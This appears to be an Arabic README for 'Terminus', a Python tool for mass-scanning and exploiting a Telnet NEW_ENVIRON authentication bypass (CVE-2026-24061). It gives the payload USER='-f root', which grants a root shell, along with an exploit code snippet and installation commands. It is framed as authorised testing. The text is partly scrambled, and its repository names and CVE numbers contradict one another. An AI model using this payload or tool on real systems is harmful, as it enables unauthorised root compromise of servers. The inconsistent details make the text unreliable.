
AsyncIO Scanner & Exploitation Framework لـ CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass). يتضمن اكتشافًا عالي التزامن، وبصمة سلبية، وتصعيدًا مصرحًا لصدفة الجذر.
محرك تحليل أمني لثغرة تجاوز مصادقة Telnet NEW_ENVIRON وتصعيد الامتيازات CVE-2026-24061.

Terminus هو أداة بحث أمني احترافية مصممة لاختبار الاختراق المصرح به وتقييم الثغرات لـ CVE-2026-24061. تؤثر هذه الثغرة الحرجة على تطبيقات خادم Telnet القديمة، مما يسمح للمهاجمين عن بُعد غير المصادقين بتجاوز المصادقة والحصول على وصول بمستوى الجذر.
CVE-2026-24061 هي ثغرة تنفيذ تعليمات برمجية عن بُعد في خدمات Telnet التي تدعم RFC 1572 (خيار بيئة Telnet). تستغل الثغرة عدم التعقيم السليم لمتغير البيئة USER أثناء تفاوض NEW_ENVIRON:
USER=john → يطلب كلمة المرورUSER=-f root → يتجاوز المصادقة، ويمنح قشرة جذرالتأثير:
الخدمات المتأثرة:
192.168.0.0/24, 10.0.0.0/8)--verify): إثبات الاستغلال، يؤكد وصول الجذر uid=0Terminus.handshake() - مصافحة متوافقة مع RFC 854Terminus.exploit() - تسليم حمولة CVE-2026-24061--exploit صريحةقلب Terminus هو فئة TerminusNegotiator، التي توفر فصلاً نظيفًا بين معالجة البروتوكول ومنطق الاستغلال:```python
from terminus import TerminusNegotiator
negotiator = TerminusNegotiator()
await negotiator.handshake(target="192.168.1.100", port=23)
result = await negotiator.exploit(payload="-f root")
if result.success: print(f"Root shell acquired: {result.evidence['uid']}")
### نهج المحرك مقابل النصوص البرمجية
**النصوص البرمجية التقليدية** (الأدوات الحالية):```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell
محرك Terminus:``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report
---
## التثبيت
### المتطلبات
- **بايثون 3.10+**
- **الأنظمة الأساسية المدعومة:**
- ويندوز 10/11 (PowerShell)
- ويندوز + WSL2 (كالي لينكس، باروت أو إس، أوبونتو)
- لينكس أصلي (كالي، باروت، أوبونتو، دبيان)
- ماك أو إس (مع بايثون 3.10+)
### بدء سريع (جميع الأنظمة الأساسية)
#### ويندوز (PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
# Run setup script
.\setup_env.ps1
# Activate virtual environment
.venv\Scripts\Activate.ps1
# Verify installation
terminus --version
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406
chmod +x setup_env.sh ./setup_env.sh
source venv/bin/activate
terminus --version
#### التثبيت اليدوي (جميع المنصات)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406
# Create virtual environment
python3 -m venv venv
# Activate (Linux/macOS/WSL)
source venv/bin/activate
# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1
# Install dependencies
pip install -e .
# Verify
terminus --version
telnetlib3 - تنفيذ بروتوكول Telnet باستخدام AsyncIOrich - واجهة المستخدم الطرفية والتنسيق (دعم ANSI على Windows/Linux)pydantic - التحقق من البيانات والنماذجaiofiles - الإدخال/الإخراج غير المتزامن للملفاتjinja2 - قوالب التقاريرpyyaml - إدارة التكوينpathlib - معالجة المسارات عبر المنصات (مدمج)